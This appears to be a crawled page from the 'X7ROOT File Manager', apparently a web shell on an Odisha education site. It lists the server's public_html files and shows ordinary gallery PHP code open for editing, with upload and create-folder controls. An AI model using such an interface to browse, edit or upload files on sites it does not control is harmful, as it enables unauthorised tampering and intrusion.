X7ROOT File Manager
Current Path:
/home/u126090504/domains/bpcaodisha.com/public_html
home
/
u126090504
/
domains
/
bpcaodisha.com
/
public_html
/
📁
..
📄
.htaccess
(1.12 KB)
📁
.well-known
📄
about-bpca.php
(3.26 KB)
📁
admin
📁
ajax-load
📁
bpca
📄
bpca.zip
(15.2 MB)
📄
contact-us.php
(4.06 KB)
📄
contactdb.php
(796 B)
📄
courses.php
(10.76 KB)
📁
css
📄
facilities.php
(10.91 KB)
📄
faculty.php
(2.89 KB)
📁
fonts
📄
footer.php
(6.43 KB)
📄
gallery.php
(2.96 KB)
📄
header.php
(6.37 KB)
📁
images
📄
index.php
(14.62 KB)
📁
js
📄
message.php
(3.09 KB)
📄
peret.php
(266.87 KB)
📄
readme.html
(199 B)
📄
robots.txt
(31 B)
📄
scope.php
(28.59 KB)
📄
syllabus.php
(2.1 KB)
📄
tap.jpg
(75.17 KB)
Editing: gallery.php
<?php include("header.php"); ?> <!-- Start main-content --> <div class="main-content"> <!-- Section: inner-header --> <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="images/bg/bg5.jpg"> <div class="container pt-70 pb-20"> <!-- Section Content --> <div class="section-content"> <div class="row"> <div class="col-md-12"> <h2 class="title text-white text-center">Gallery</h2> </div> </div> </div> </div> </section> <!-- Divider: Contact --> <section id="gallery"> <div class="container pt-70 pb-70"> <div class="section-title text-center"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h2 class="mt-0 line-height-1 text-center mb-10 text-black-333 text-uppercase">Our <span class="text-theme-color-2"> Gallery</span></h2> </div> </div> </div> <div class="section-content"> <div class="row"> <div class="col-md-12"> <!-- Portfolio Gallery Grid --> <div class="gallery-isotope grid-4 gutter-small clearfix" data-lightbox="gallery"> <?php require 'admin/database/dbconfig.php'; $query = "SELECT * FROM gallerytab"; $query_run = mysqli_query($connection, $query); $check_img = mysqli_num_rows($query_run) > 0; if ($check_img) { while ($row = mysqli_fetch_array($query_run)) { ?> <!-- Portfolio Item Start --> <div class="gallery-item campus"> <div class="thumb"> <img class="img-fullwidth" src="admin/galleryimages/<?php echo $row['fileimg']; ?>" alt="project"> <div class="overlay-shade"></div> <div class="text-holder"> <div class="title text-center"><?php echo $row['nimg']; ?></div> </div> <div class="icons-holder"> <div class="icons-holder-inner"> <div class="styled-icons icon-sm icon-dark icon-circled icon-theme-colored"> <a href="admin/galleryimages/<?php echo $row['fileimg']; ?>" data-lightbox-gallery="gallery" title="Mayurbhanj medical Academy"><i class="fa fa-picture-o"></i></a> </div> </div> </div> </div> </div> <!-- Portfolio Item End --> <?php } } else { echo "No Records Found"; } ?> </div> <!-- End Portfolio Gallery Grid --> </div> </div> </div> </div> </section> </div> <!-- end main-content --> <?php include("footer.php"); ?>
Upload File
Create Folder